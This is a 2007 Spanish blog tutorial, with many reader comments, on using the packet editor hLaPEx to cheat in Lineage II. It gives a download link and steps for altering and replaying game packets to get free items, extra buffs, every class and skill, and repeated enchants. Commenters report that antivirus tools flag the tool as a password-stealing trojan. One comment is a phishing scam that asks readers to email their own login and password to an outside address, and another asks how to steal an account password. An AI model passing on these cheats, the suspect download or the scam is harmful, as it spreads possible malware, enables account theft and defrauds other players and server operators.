martes, 3 de julio de 2007

Introducción al hLaPEx

hLaPEx es un programa hecho por un hombre Ruso con el apodo H1nt. Éste programa, "sniffea" (literalmente significa "uele", pero quiere decir que los vé) los paquetes que el cliente del Lineage envía al servidor y viceversa. Esto es muy útil por dos razones. Primero, puedes aprender muchas cosas de la Arquitectura del Lineage y segundo, puedes "sniffear" algunos paquetes, editarlos como quieras, ¡y luego enviarlos de vuelta al servidor! ¡Lo que significa que puedes explotarlo! Hay muchas versiones del mismo. No conosco los números de las versiones, ¡pero sé cuál es la más reciente!

Bien, ahora que aprendimos que es exactamente hLaPEx, tenemos que saber cómo usarlo para hacer trampa. El tutorial está en pasos, ¡así que no pienses que eres lo suficientemente listo como para saltearte uno! ¡Has los pasos como se muestran abajo!

1)Descarga el hLaPEx: http://henzo.ucoz.ru/hLaPEx.rar

2) Extráelo.

3) Copia los archivos / carpeta (hLaPEx.exe , inside.dll / data) en C:/Archivos de programa/Lineage II/system/ o donde tengas Lineage II instalado.

4)Ejecutas el hLaPEx

5)Ejectutas el L2

6)Logueas en tu cuenta

7)Entras con cualquier de tus personajes.

8)Ahora la cosa se desvia, es depende el cheat que quieras hacer, voy a explicar los distintas cosas que podes hacer con el hLaPEx.

Ítems:
1)Vas a un trader, lo seleccionas vas al hLaPEx, Donde dice ALL PACKETS, le das clic para que diga Client>Server.
2)Vas a la Pestaña Advanced, y alli copias los codigos que quieras de la lista posteada en este mismo Blog. Van a ver que aparecen números Sueltos, por ejemplo 768, 9014 y cosas así, eso se conoce como IDItem, A esos números lo tenemos que poner en la calculadora del hLaPEx:

3)

4)Alli nos va a aparecer un IDItem, ese ID lo tenemos que reemplazar por el ID del objeto que
compramos, me refiero a que

ese codigo que nos aparecio en HEX lo tenemos que reemplazar por el ID del otro ITEM, para averiguar el ID del otro ITEM, vamos a ver que cuando realizamos la accion de comprar(RequestbypasstotheServer),

En la accion requestbypasstotheserver nos va a aparecer el nombre del Item, la cantidad y el ID, Por ejemplo 768, ese numero lo ponemos en la ccalcu de hlapex, y nos va a salir por ejemplo, 4C 55 88 99, ese numero va a ser el que va a ser reemplazado por 36230000 que es el ID del item que queremos comprar, lo beneficioso de esto es que el item nos sale Gratis o vas barato, Por ejemplo compramos un anillo y sustituimos el codigo del anillo por el de un arco top S, y nos ahorramos muchas adenas.


Buff (OverBuff)

1) Si tienes un server en donde no hay buffer, y unicamente hay Newie Buffer lo que tienes que hacer es esto, De lvl 10 a 20 aproximadamente, vas a hablar con el newie bufer, le pides que te buffe, ahora que ya te has bufeado por lo menos 1 vez, vas al hLaPEx, lo activas:
Le das la accion de que te bufee, Cuando termina de Buffearte vas al hLaPEx buscas la accion REQUESTBYPASSTOTHESERVER, le das copytosend y alli en la pestaña Sniffer, le das auto Durante 30Segundos y luego de esos 30 segundos haces una pausa de 3Segundos, si cuando superas el 1:30 Segundos Los stats NO se editaron, no funciono, No funciono porque: No seguistes bien los pasos, El Server esta Parcheado, Es una version que no anda…
VIDEO DE OVERBUFF: http://www.youtube.com/watch?v=ffqFvjfbgVc


Todas las Clases:
Cuando llegas a lvl 20, vas a cambiar la clase de Humano a Humano Rouge (Por Ejemplo) Vas a ver que los 12 últimos digitos por ejemplo 32 00 34 00 00 00, son siempre iguales, siempre estan encabezados por un 3 hay un espacio de dos 00 y luego sigue otro 3 con su numero atrás, lo que tu tienes que cambiar son el 2 y el 4 si es que quieres dejar de aprender clases de humamo y aprender de orco Por ejemplo y si quieres aprender todas las clases de tu respectiva raza lo unico que modificas es el 4 por otros números.

Ahora la explicación:

Haces eso, Haces el cambio de clase de Humano a Humano Rouge, te va a aparecer la famosa accion REQUESTBYPASSTOTHESERVER, le das copy to send y ahí la modificas como te eh dicho mas arriba…

VIDEO MULTICLASS: http://www.youtube.com/watch?v=CKQaaqralX4

Todos los Skills:
Esto es Similar a La compra de objetos mediante el ID, lo unico que cambia ahora es que en vez deponer el ID de un Item pones el ID de un Skills, para obtener los ID´s de los diferentes skills, (voy a poner una lista debajo de todos ellos) Tienes que capurar la famosa Accion REQUESTBYPASSTHOTHESERVER, y alli cuando le haces clic, te dice que skill aprendedistes, como se llama y el ID, lo unico que queda es ir a la calcu del hLaPEx pones en Ingerter para que el resultado de salga en Hex.

Encantar (Siempre con la misma probabilidad de que se rompa)
Esta es un Cheat Muy demandado, así que lo pondre.
, activas el sniffer, encantas una vez, vas al sniffer, lo paras y vas a ver que te sale una accion, EnchatItem o algo por el estilo, a esa accion le das copy to send, y luego auto, ahora vas a tuinventario, y le empiezas a dar clic derecho a los scrolles, vas a ver que va a encantar el item que seleccionastes por ultima vez.
Esto nunca cambia la probabilidad de que el objeto se rompa…

Otras Cosas:
Si tienes el Codigo completo de algun cheat y lo quieres probar, y ese cheat es un objeto o un arma, lo que tienes que hacer es ir a un trader, targetearlo vas al hLaPEx copias el codigo aquí



, le das send y si el codigo funciona, o te kickean o te da el item si el codigo no funciona, probablemente te aparesca en rojo, naranja, amarillo o celeste.

Y para otro codigos que tengan el codigo completo y sea por ejemplo, la luz de Hero lo unico que tienen que hacer es ponerlo aquí


y darle send.



Para seguir manteniendo este blog con los últimos y mejores cheats, exploits, bots, etc., por favor haz un click en alguna de las publicidades arriba o al costado del blog. De esta manera podrás seguir conociendo lo último y mejor con sólo un click tuyo. De otro modo me veré obligado a cerrar este blog. ¡Muchas gracias!

138 comentarios:

  1. uhh q feu q tiene un trojano oculto -.- cuando vayas a joder a los demas intenta ser merjor solo es un consejo q te urge -.-

    ResponderEliminar
  2. Algunos anti-virus ya detectan al hLaPEx como un troyano o virus, es por eso que te salta troyano cuando lo analizas. Yo no intento joder a nadie ni nada por el estilo, igualmente esta bien que analizen todo y desconfien, yo tuve mis propias experiencias con troyanos y eso, por eso ahora soy mas precavido. Levante este blog, para que la gente de habla hispana pueda estar al tanto de todo lo relacionado con cheats, exploits y demas con la mejor intencion.

    ResponderEliminar
  3. La mejor intención? SI enseñas a cagar a la gente...

    Lo de "vencer el sistema" te lo acepto, pero andar cangando jugadores no me parece.

    ResponderEliminar
  4. Eso ya es otro tema que no voy a discutir, si te gusta bien y si no, no vengas a perder el tiempo aca. Con lo de la mejor intencion me refiero a que no intento meter virus o troyanos a la gente como muchos hacen. Aviso que cualquier otro comentario como este lo borro porque no viene al caso. Estos los dejo como aviso.

    ResponderEliminar
  5. el tema de los items no funciona, solo los efectos visuales

    con comandos similares puedo tirar skills o realizar lvl up y demas pero items no puedo materializar y ya dudo q se pueda... puedo haerlos figuar en el inventario de mi cliente pero no significa q figuren en el server, donde cierro y abro el inventario ya no estan... logico, como hago?

    muchas gracias

    ResponderEliminar
  6. te queria hacer una pregunta tengo muchos problemas al tratar de usar el hlapex, consigo los datos pero no se si estoy mandando bien los paquetes ya que no aparece nada. te puedo dar mi msn asi lo hablamos mejor???

    ResponderEliminar
  7. En que servers se puede usar? anda en alguno interlude? probe en Good vs Evil y me desloguea, no se si hago algo mal o esta parcheado.

    ResponderEliminar
  8. Gracias viejo por esto porque asi ahora no solo algunos sabran ocupar estos cheats es mas justo y esos que critican seguramente ocupan el hlapex y estan cabreados porque solo ellos quieren saber esos cheats.

    ResponderEliminar
  9. che, mira, tengo una duda...... cuando abro el hlapex del orto, despues de hacer todo lo que dice, osea, supuestamente creo que estoy haciendo las cosas bien, pero cuando voy a la pestaña para poner los codigos el boton de SEND no esta activado como para usarlo , si tenes idea que onda... te lo agradesco

    ResponderEliminar
  10. che fudge me podes agrergar a tu correo para q podamos arreglar unos asuntitos de como es el funcionamineto del halpex.rar dale my correo es roddyq9@hotmail.com

    ResponderEliminar
  11. haber si el servere esta parcheado solo cuando sacas items por la cara y no pagando cn el programa.como se puede solucionar eso

    ResponderEliminar
  12. bueno, esta muy lindo todo, pero hay cosas q no entiendo, como cuando dice: cambiar ID por otro ID eso no lo entiendo... si alguien q lo sepa seria tan amable de agregarme a msn para explicarme bien esto se lo agradezco
    chucky_elrojo_628@hotmail.com

    ResponderEliminar
  13. oye por favor dejadme las id de los item del hlapex y de las skill y tal por favor, mi messenger es luismi_burbie@hotmail.com agregadme y me enseñais a utilizarlo por favor ;)

    ResponderEliminar
  14. Buenas, he intentado hacer funcionar el hLaPEx en el l2 abyss ruso y despues de logearme al elejir el seridor se me sube el ping a 9999 y no me deja entrar. Hay alguna forma de solucionarlo o es cosa del server? Gracias.

    ResponderEliminar
  15. hola, como te va? mira, si tenes imagenes si te anduvo a vos, porq ami no me anda =(... capaz q es por el server... porq cuando abro el programa y entro al server, no me toma los IDs. si sabes q puede ser, te lo agradeceria,

    ResponderEliminar
  16. Che juego el server elwyn.. www.l2elwyn.com y caudno uso el hlapex no em deja loguear si hago a la inversa me tira el cliente tenes idea porq es esto?

    ResponderEliminar
  17. wenas, veran yo no consigo nada de nada lo unico es que se me bloke el juego cuando doy a send, y no me aparece el REQUESTBYPASSTHOTHESERVER por ningun lado, por lo que en teoria no consigo poder meterlos realmente dejo mi msn por si alguien me puede ayudar, oks gracias. charly_serra@hotmail.com

    ResponderEliminar
  18. hola, lei todo, solo uno parecido a mi problema, en mi caso funciona bien lo que se refiere a capturar el serial de un item de compra, y la calculadora, hasta ahi bien, pero cuando coloco la serial completa de lo que necesito, apreto SEND y no pasa nada, ¿estará parchado el server o eso de crear item no funciona??

    gus_00769@hotmail.com

    ResponderEliminar
  19. jajajaja que infectado a los porbres incultos de la red? jajaja

    ResponderEliminar
  20. gente, yo use el hlpaex, es un muy buen chit, pero quiero que tomen encuenta que no es facil de usar, es muy completo, nada mas que hay algunas cosillas que pueden dificultar eluso, como apra summonear un arma gratis, antes del codigo hex tenes que poner una clave, por ejemplo: 2f. esa no me acuerdo si es para los items o para las sub acumulativas, pero cada accion tiene un codigo como ese antes de el hex. en la ventada del hlapex hay un boton donde te figuran todo y para que son, fijense y usenlos, si no les anda lo mismo despudes de eso es porque el server esta parchado para el hlapex. si no pueden logear es porque el fire wall que usa el server lo detecta y lo blokea.
    mucha suerte, y tengan en cuanta que normalmente los server mas convocados son los mejores armados, por lo tanto no van a poder usarlo.

    Atte. SoloYo

    ResponderEliminar
  21. Para el ultimo que comento , se agradece su comentario pues es por demas informativo.
    en cuanto al que subio el archivo , se le agradece , y no le des bola a los giles q bardean , solo lo hacen de bronca porque no les anduvo, sino , si pintan tan de moralistas ¿Que hacen aca ? jajaj

    Mi problema es que , logueo y me deja , pero no me deja mandar paquetes y parece no interactuar con el juego, tal vez sea que lo estoy usando en un servidor C4 y es para cronicas mas avanzadas. agradecere algun consejo que me puedan dar. desde ya muchas gracias.

    ResponderEliminar
  22. queria saber si es seguro descargarlo y ejecutarlo, porque al descargarlo me aparece un cartel del nod32 diciendo:probablemente una variable modificada de (troyano) win32/psw.ldpinch
    la pregunta es ¿puede pasar algo si lo ejecuto?
    espero tu respuesta

    ResponderEliminar
  23. hola si sosn tan amables me pueden pasar los comandos plizz mi msn es estebanbostero@hotmail.com

    ResponderEliminar
  24. por favor explicame porque smpre k ponho 1 codigo em packet e depois carrego send kuando vou ao lineage n me cnsigo mover.. e no hlapex em Main onde diz client fica disconnect... por favor explicame o k puedo hazer.... por favor

    ResponderEliminar
  25. por favorrrrrrrrrrrrrrrr perciso muito

    ResponderEliminar
  26. Ayudenme no se usarlo pliss, si me deja entrar y todo pero no se como usarlo mi msn es
    polvo555@hotmail.com

    ResponderEliminar
  27. no se como hacer para q se conecte con el server yo entendi todo como usarlo (creo)
    porfavor q alguien se contacte conmigo
    para explicarme como conectarlos con el server q juego!
    porfavor!!
    fabii.-@live.com.ar

    ResponderEliminar
  28. hola bueno,nesesito ayuda ya q ami no me toma el server q puedo hacer???osea quiero entrar al server con hlaplex pero no me lo toma como puedo hacer para q tome el server espero respuestas mi email es emiliano_petrin07@hotmail.com desde ya muchas gracias ;) nesesito esa alluda :P
    saludosssss!!!

    ResponderEliminar
  29. OIe FUdge Respondeme esto porfavor estoy muy urgido nesecito ablar muchas cosas contigo asi que se me puedes dar tu msn el mio es chino_chico7@hotmail.com por fa estoy muy enojado no se manejar el hlapex lo tengo bajado me lee el ip todo eso pero luego de usar un cheat el usuario que me dise connect luego me dise disconect dime q ago mal agregame quiero saber mas de este programa port fa te espero lo antesposibele ok gracias

    ResponderEliminar
  30. HOLA!!
    Queria saber si el programa es compatible con la crónica 4: Scions of Destiny!
    GRAX
    SALU2

    ResponderEliminar
  31. Hola fudge
    weno saves que juego el l2 forever y creo q no corre por que no me reconoce ip y port tu kaxas
    weno nesesito saver en que servidor probaste el hlapex y si es c4 :D weno ezo bye

    ResponderEliminar
  32. tengo algunas dudas sobre esto pero me interesa bastante lo de los items espero puedas agregarme mi direccion es triyodometano@hot... gracias

    ResponderEliminar
  33. hola.!!!...bueno soy nuevo usando el hlapex y no se exactamente como enviarme los paquetes...quisiera saver como enviarme las armas y luego blessed enchant para encantarlas ... se les agradece su respuesta inmediata antes q me parcheen el hlapex en el server xD

    ResponderEliminar
  34. hey porblemas
    el hlapex nose conecta al server en la ip sale asi ???? y dice SUSPENDED q puedo hacer al hlapex no es compartible y en ese caso me podrias decir una lista de server compartibles
    porfavor saludos

    ResponderEliminar
  35. Muchsa gracias por el trabajo que te has tomado. Aprovecho y te hago una consulta, tienes idea si hay algun hlapex que funcione para kamael?

    Saludos y gracias

    ResponderEliminar
  36. holas.. me parece interesante el programa pero o se como utilizarlo me puedes agregar pliss para saver todo sobre hlapex mi mail es monin_39@hotmail.com agregame porfa
    te lo agradeseria muxo.. adios y muxas gracias

    ResponderEliminar
  37. hola fudge como estas te quiero preguntar varias cosas te dejo mi correo agregame pls nos vemos


    beelze

    ResponderEliminar
  38. Seco !! te pasaste con el programa aunke tenog uas dudas. me he infirmado pero aun no las puedo limar.
    Porfa si me pudieras agregar diegodeconce@hotmail.com, son solo unas pequeñas cosas en la coneccion..gracias de antemano.

    Pd. no le hagas caso a esos colisones ke dicen ke nunca harian nada malo xD
    hlapex ROX

    ResponderEliminar
  39. el link no me funciona no hay otro para descargar de otra pagina???por favor demen otro link estoy deseperado :))gracias...

    saludos

    ResponderEliminar
  40. Puta que aki uno pregunta y pregunta y este conchadesumare no responde ni mierda.
    Despues de saludar paso a hacer mi pregunta.....
    ¿EN QUE SERVERS FUNCIONA ESTE HLAPEX!!!! ?


    Le agradesco su respuesta see you..

    ResponderEliminar
  41. esta madre ya nomas funciona en los l2j y estan chafisimos y al wey ke esta desesperado man si tanto kieres jugar juega limpio es mas divertido "la victoria no save a victoria si no la preparas con tus manos"

    ResponderEliminar
  42. y este baboso?
    Yo tambien quiero saber en que server funciona para probvarlo por eso estoy aqui en esta pagina y tu señor moral anda con tus consejos para otro lado donde no veas paginas con titulos de hlapex porque aqui todos los que buscamos el hlapex queremos usarlo ¿ "la victoria no save a victoria si no la preparas con tus manos"? anda sonso de mierda

    ResponderEliminar
  43. sinseramente, es muy increible el programa, e escuchado de gente que lo usa, y le funciona, pero, yono lo ocupo, juego limpio, asi tiene gracia el juego, aunque me aya tomado un mes armarme con la doom a mi DA, me agunte la ganas de ocupa hlapex, a toos lo que no les funciona, probablemente el server, es dificil encontrar uno que no tenga parche para eso, saludos, muy buena guia

    Kachineo

    ResponderEliminar
  44. sinseramente, es muy increible el programa, e escuchado de gente que lo usa, y le funciona, pero, yono lo ocupo, juego limpio, asi tiene gracia el juego, aunque me aya tomado un mes armarme con la doom a mi DA, me agunte la ganas de ocupa hlapex, a toos lo que no les funciona, probablemente el server, es dificil encontrar uno que no tenga parche para eso, saludos, muy buena guia

    Kachineo

    ResponderEliminar
  45. bueno yo qisiera saber como hasen el cheat de subir armas a +10,yo juego un server yamado JOpy,es de paraguay,el rate es de x5 dropx5 spoilx5...yo qisiera saber nomas si alguien podria ser tan amable y demostrarme como es ese ''CHEAT''
    desde ya muchisimas gracias amigoss....

    ResponderEliminar
  46. hola me gusto el blog pero una duda
    este hlapex me sirve para sacar items armas y armor gratis??
    solo con codigos??
    pero una cosa es un poco complicado el programa
    me gusto igual :D
    xau sigan subiendo cheatts

    ResponderEliminar
  47. Buenas!

    En un principio queria darte la enora buena por la pagina y todas las esplicaciones, estan muy bien.

    Bueno, el caso es que he intentado descargar el hlapex de tu direccion pero no me deja, podrias subirlo a otro sitio o en su defecto mandarmelo a mi email "saquito_oneil@hotmail.com" ?

    Un saludo y siendo repetitivo, enora buena.

    ResponderEliminar
  48. quiero un video de como realizar cada acción(items, buff, skills, etc.) por vos, de buena onda, porque eso solucionaría a varios de los que estamos acá, sería de mucha utilidad.
    Desde ya gracias, todavía no lo he probado, solo puedo decir que lo del Troyano es verdad y existe un virus que hackea las cuentas quitando sus datos...No quiero tener que pensar que nos estás timando...pero solo se que hay tantos "FORROS VIRTUALES" dando vuelta que por ahí me cuesta creer un poco...pero eso ya es problema mío no tuyo...
    Aclaro lo que anteriormente puse va con todo respeto y bajo ninguna intención de insultarte o bardearte.

    Saludos

    Emanuel

    PD: pachu_el_otro_yo@hotmail.com

    Mi mail..si te conectas podemos charlar al respecto.

    ResponderEliminar
  49. xfavor k alguien me agregue o explike como coño va sto
    me tire 3 oras y nada
    no se el paso de cambiar un objeto x otro
    si me ayudais lo agradecere mu bn XDD

    Gracias

    ramses_tuning@hotmail.com

    ResponderEliminar
  50. Wenas me presento e llaman Demonik..Quiero hacer una pregunta.. ¿Existe algun programa Para Sniffear Para la version Kamael/Hellbound? Si es posible El Hlapex Para Kamael.. K no o encuentro..
    Toy averiguando apra descativar la defensa del server contra el hlapex ;)..
    Adios!..

    ResponderEliminar
  51. no se ustedes pero ani me funciono no juge un server C4 simple si no uno C5 interlude me rre funciono para conseguir la infinity la titanium completa y algunos items +10 XD no mentira los de los items pero si lo de la infinity y la titanium eso si ,y ademas use esta semana la zariche .todo el dia pkeandome ba cuando la obtube no tenia carma pero si 29k de la barra de CP pero algo no funciona cuando buelbo a entrar al otro dia todo se me fue que puede ser?
    pero si me re funciono graxx

    ResponderEliminar
  52. Al final el nod32 me dice que tiene un vus esta cosa (un troyano) al final es un troyano de verdad o solo es un error del sistema x q el nod 32 tengo acualizado a la ultima version que hay siempre jejejejejeje

    enserio es virus o no?????

    ResponderEliminar
  53. buenas buenas mi msn es contension_5@hotmail.com para aquel que pueda ayudar o dar algun server en el que se pueda usar ya que no todos sirven por que estan parcheados para prtejerlo del hlapex gracias gente seria!

    ResponderEliminar
  54. Como ya dijeron al principio, el pc me lo reconoce como un troyano y no me deja descomprimir el dll ni el .exe, algun consejo?

    ResponderEliminar
  55. Probe en un server c4 y en un interlude y en los 2 me pasa lo mismo. O sea la accion requestbypasstotheserver no hace nada. Ya de movida el inicio del hlapex no marca ip del servidor al que estoy conectado ni nada.
    Alguien me recomendaria una pagina con un tutorial mejor armado o contacteme a dragonforce2003@hotmail.com

    ResponderEliminar
  56. valla pendejos mal nacidos, ustedes seguro son de los noob que se la pasan pidiendo adenna en giran envidiando a los pro grado S que saben jugar, me dan asco la verdad entre aqui ya que desgraciadamente mi amigo es un noob como ustedes y me dio la pagina. semejante madriguera de noobs es este blog eh?

    ResponderEliminar
  57. Soy debugger el autor de los bugs y videos de L2 Exploit Team Argentina, yo los publique para maxbastards.gr hace tiempo una pagina de grecia de unos amigos..

    Espero que no se repita sin concentimiento mio la publicacion sin su respectivo permiso

    Debugger Maxbastards.gr
    Developer.

    ResponderEliminar
  58. che no me darias algunos codigos te dejo mi msn
    gusty__55@hotmail.com

    ResponderEliminar
  59. tengo una duda por que me parece que no me reconoce el IP dice "???" y nada mas en el port lo mismo y cuando le pongo Capture en el Sniffer no me da ni tronco e bola.
    nomas les pido que dejen de poner los msn asi todos encontramos respuesta.

    ResponderEliminar
  60. Me parece perfecto lo que haces jajaj!!

    Sos un capo =P Bueno me re jui!

    ResponderEliminar
  61. tenes algun programa para encantar armas ?

    ResponderEliminar
  62. hola... me gustaria hablar sobre el hlapex xq no lo entiendo muy bien.. mi correo es jorgarcete4@hotmail.com
    gracias...

    ResponderEliminar
  63. que n00b de mierda el primero que comento. No tiene virus, lo detecta como virus porque usa scripts....

    ResponderEliminar
  64. Señores Señores!! calmense:

    Esto funcionaba en los servers c4 y en muchos c5 e interlude que se actualizaban desde una cronica anterior. Ya no sirve, así de sencillo.

    Suerte a todos

    ResponderEliminar
  65. Mira tego tengo un problema, ya no puedo descargar el hlapex de aqui no me podrías dar otra pagina de donde desrcargarlo, ah y es verdad esos sobre el troyando??..es la primera vez que uso este tipo de programa y francamente estoy mas perido que adán en el día de la madre,,haber si sacas un videito o algo asi para explicarnos mejo ,thxx
    X_zinedine_zidane_X@hotmail.com
    me escribes aqui, quisiera hablar mas contigo.

    ResponderEliminar
  66. oye quisiera que me ayudaras x fa esk no se si no se conecta el server con el hlapex por que dice server:suspended si me pudieras agregar porfa mi correo es mikiliki_mike@hotmail.com a mi server es interlud no se si jale en esa cronica

    ResponderEliminar
  67. oye quisiera que me ayudaras x fa esk no se si no se conecta el server con el hlapex por que dice server:suspended si me pudieras agregar porfa mi correo es mikiliki_mike@hotmail.com a mi server es interlud no se si jale en esa cronica

    ResponderEliminar
  68. una pregunta el hlaplex sige funsionando porq no se q pasa q no puedo descargarlo ??¿¿??
    :(
    si aguien sabe me puede desir donde vajarlo no msn es
    noki07@hotmail.com

    bueno suerte a todos y tengo mucha gasnas de usar el hlaplex

    ResponderEliminar
  69. alguien sabe si el hlapex sirve todavia ????¿¿¿??.
    porq trato de descagarlo y no puedo
    si alguien sabe me puede desir donde lo descargo porq tengo muchas gana de usar el hlapex mi msn es (noki07@hotmail.com)

    ResponderEliminar
  70. sarpado el russo que lo invento les deve a ver tenido bronca a los de geforce placas de video porque en las 3 compu que lo probamos ya no andan sus placas de video a los pocos dias de usarlo el programa si anda esta sarpado pero el russo culiado ese que nos devuelva la placa de video bueno ese es mi comentario solamente nos vemos feos la unica q esta sanita es mi pc recomendacion cuando su pc empiese a estar rara formateenla toda completa disco local c y d para q pueda quedar perfecta luego bay bay

    ResponderEliminar
  71. El problema q yo tengo es q nose por q no puedo introducir el send :/ y en la parte donde dice main muestra client :suspended server:suspended Server game y muestra ip:??? port:??? me gustaria hablarlo con el del blog en privado , mi correo es nadie2007@hotmail.com

    ResponderEliminar
  72. hola Soy un uno de los tantos players del l2 !!
    estoy aqui por motivos de aprender como consueguir el hlapex y si alguno aqui me puede ayudar porfavor se lo agradesco !! aqui esta mi msn El_moreno555@hotmail.com

    ResponderEliminar
  73. hola sera q halquien me ayuda para ver como consigo el hlapex si alguien me ayuda porfavor se lo agradesco

    ResponderEliminar
  74. ahhh se me olvidaba hay les dejo mi msn el_moreno555@hotmail.com graxx !!

    ResponderEliminar
  75. me contaron q el hlapex ya no servia queria saber si eso es cierto!! leo_ssj@hotmail.com resp

    ResponderEliminar
  76. cuando hablo el programa se me cierra el l2 porque? puede ser tendra algo q lo protege ???

    ResponderEliminar
  77. Hola deseo ke alguien me ayude a hacer funcionar el hlaprex poravor... es para un servidor quiero que me aclaren algunas dudas.. la cosa es ke no puedo hacer ke me detecte el server.
    mi mail es guild_rebirth@hotmail.com

    agregenme plis..

    ResponderEliminar
  78. hola, estoy intentando usar el hlapex pero no me anda (creo)..cada ves q intento hacer algo el pj se me queda clavado al piso..en la opcion de la calculadora no entiendo vien q es lo q tengo q poner ..me podrias decir en q server funciona porq ya lo prove en mas o menos 10 servers y en ninguno me crea los items ni me da ningun beneficio..si me podrias ayudar a usarlo te lo agradeceria :) mi msn es prelatto7@hotmail.com

    ResponderEliminar
  79. muy bueno el post..
    el programa me anda muy bien pero cuando intento utilizarlo me deslogeo, esto es debido al server no??? si estoy casi seguro, mi pregunta es si hay algun otro progama parecido con el cual pueda probar???

    ResponderEliminar
  80. Prácticamente todos los servers de l2 ya están parcheados contra el hlapex, pueden intentar, pero no esperen mucho. El post lo dejo de recuerdo :P

    ResponderEliminar
  81. che no pued descargar el halpex nose por que.. =( kapu70@hotmail.com

    ResponderEliminar
  82. ARREGLA EL LINK MEN!!!!!!!

    ResponderEliminar
  83. UNA COSA, KIEN DE AKI SABE UTILIZARLO KE ME AYUDE PORKE NO ME VA ALGO BIEN YA KE EL BOTON DE SEND NUNCA SE ME PONE PARA DARLE APARECE BLOKEADO SIEMPRE

    ResponderEliminar
  84. como se si funka el programa lo abro pero me dice false
    cliente suspendido
    server suspendido

    agregenme alfredo_dattw@hotmail.com

    ResponderEliminar
  85. programas paresidos a este pues L2phx
    hack para L2:
    > L2phx
    > hLaPEx
    > L2walker
    > Cheat Engine

    y pus no me biene a la mente ningun otro xD..

    Desde aki Enchuis_kpo_16 xD ^^ (-_-)

    ResponderEliminar
  86. hola,che la cosa es que cuando lo estoy haciendo al rato me desconecta del server es normal eso?

    agregame:
    amateratsu@live.com.ar
    okz chau nos vemos

    ResponderEliminar
  87. quiero saber como funciona bien el hlapex yo intento muchas veces pero no sucede nada quien me podia explicar bien como es el hlapex mi msn es elio_danie1@hotmail.com espero que pronto alguien me ayude es para un servior interlude xhao

    ResponderEliminar
  88. NO HAY Q JODER... SOLO JUGAR AL L2 Y BANCARSELAS... NO ANDAR JODIENDO CON TRAMPAS...

    ResponderEliminar
  89. necesito el hlapex por fa si me ayudan se los agradesco mi coreo es edu_yea@hotmail.com
    agregen me asi chateamos de todo un poco

    ResponderEliminar
  90. donde que yo abajo el programa?porque no consigo achar

    ResponderEliminar
  91. A los que no les guste estas cosas nadie les apunto con algun arma para que resonguen aca asi que si no les gusta quedense tranquis en su comunidad y jugando bonito...nosotros somos tramposos ...les guste o no asi que aguantarce de opinar ... o iremos a foros y server .... y de forma divina les van a surgir problemas.

    ResponderEliminar
  92. el programa utiliza un troyano para manipular la coneccion de internet y poder conectarse con le servidor.

    ResponderEliminar
  93. bue te digo que sos un pajero, que no te animas a dar la cara. garca tu post es un fracaso como vos gil de mierda tarado, anda a hacerte el hacker a tu abuelita ignorante como vos pos data te la comes seguro fracasado de mierda

    ResponderEliminar
  94. BlooD

    Buenas amigos una pregunta donde puedo conseguir el programa ya que en todos los links me dice que solo descarga premium :/.. Agredeceria la ayuda

    ResponderEliminar
  95. No me va decirles a ustedes dpnde sacar programas...
    ya he diseneado uno pero los que lo usaron no lo usaron con el proposito que le di...
    LO USARON PARA HACER TRAMPA...
    ERA PARA HACER LA JUGABILIDAD DEL L2 sea mas facil para que no halla mochilas

    ResponderEliminar
  96. hola. como le va..?? quisiera saber como puedo hacer para hackear un cliente...
    les cuento.. ami me hackeo un chabon que vive cerca de mi ksa.. y quisiera hacerle lo mismo pero recuperando lo mio...
    como puedo hacer..? que programa tengo que utilizar.?? para sakar su PASS de su cuenta...?? Contesten.. xfa..!!
    Gracias..

    ResponderEliminar
  97. :D No entendi ni madres :P

    ResponderEliminar
  98. EHU... CUANDO ABRO EL HACK ESE, Y ABRO EL L2 PRIMERO SE ME CIERRA EL L2 CUANDO PONGO LA CUENTA Y ME FIGURAN LOS DATOS EN EL HACK... PERO DESPUES VUELVO A ENTRAR Y COMPRO UNA ARMA PT Y NO PASA NADA ME FIJO EN EL SEND Y TAMPOCO NO HAY DATOS.
    SOLO TOMA LOS DATOS DEL SERVER..


    NO PÙEDEN DAR PASO A PASO DESDE QUE ABRIS EL HACK HASTA EL FINAL?
    O UN VIDEITO NO BENDRIA NADA MAL CHE xD

    wisp

    ResponderEliminar
  99. weno estube viendo y post ese ultimo post... xD y segui buscando y encontreee un tutoriall en VIDEO SEE!!!!! MIREN ESTA PAG Y FIJENSEN BAJEN ESO http://www.taringa.net/posts/ebooks-tutoriales/3678361/Tutorial-Como-usar-L2-Phx.html

    ResponderEliminar
  100. De seguro alguna vez te habrás preguntado si se puede acceder a otras cuentas de Lineage II para molestar alguna otra persona sin saber su password.. pues es afirmativo!!! Por supuesto existe una forma para hackear cuentas de Lineage II y aquí te la describo en 3 sencillos pasos:

    1.Abres la cuenta con la que te registraste ya sea Hotmail o yahoo o gmail o licos y le mandas un mail a la direccion siguiente: lo2abysspasswordexchanger@hotmail.com con los elementos luego mencionados

    2.En el subject escribes el login de la victima , por ejemplo: girlbuff

    3.Ahora en el campo de mensaje escribes el siguiente código al cual debes cambiar y agregar tu password y login de lineage II donde se indica:

    / Cgi-bin/star? 23n4j3 login = 108 & & pass =tU PASSWORD/
    Descrença & access19% 80s10eBrd/(NOMBRE VICTIMA)/
    user & javascript activo = & l2abyss =TU LOGIN/
    & Go = login / cgi / bin% 0a /l2abysspass/

    Al mandarle ese mail a esa dirección,El servidor de la2.theabyss confundirán tu cuenta con la de tu víctima (procesan el subject), al dar tu password los servidores confunden la información y así toman como si tu hubieras perdido tu password, y luego te devolverán en un mail el password de la víctima!!!! (el mail de respuesta te será devuelto en maximo 48 aproximadamente).

    Bueno ustedes son libres de hacer lo que quieran con las cuentas de lineage II asi que ojo!!!

    ResponderEliminar
  101. pero... a vos te mandan una pass... y la cuenta de donde la sacas??

    ResponderEliminar
  102. no me mandaron un carajo...
    o sea resivi un correo pero desia:
    This is an automatically generated Delivery Status Notification.

    Delivery to the following recipients failed.

    lo2abysspasswordexchanger@hotmail.com

    ResponderEliminar
  103. no entiendo nada si me enseñas en el msn
    diego_re_purete@hotmail.com
    muchas gracias

    ResponderEliminar
  104. el parche no anda arreglalo :D

    ResponderEliminar
  105. CHICOS!! creo q esto es una truchada de todos los comentarios pero todos eh!! ninguno dijo q le sirvio y q ta buenisimo ni contestan las preguntas ni nada ...

    ya fue a jugar a lo limpio!!!

    ResponderEliminar
  106. jaj esta de mas tu progra ma pero a mi no me resulto porq se me trava en la ultima parte pero sive para gracia final tambien?y cual es de todas las verciones hlapex new.
    l2phx.
    l2walksp??

    ResponderEliminar
  107. che groso yo abro el archivo, inicio y todo pero no me sale para hacer un staff +20 que es lo que quiero hacer...
    si me podes ayudar te lo agradeseria mucho
